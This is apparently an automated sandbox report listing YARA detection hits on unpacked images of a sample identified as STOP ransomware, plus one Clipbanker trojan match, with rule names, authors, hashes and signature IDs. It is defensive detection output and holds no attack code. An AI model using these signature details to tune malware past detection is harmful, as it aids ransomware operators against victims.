Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
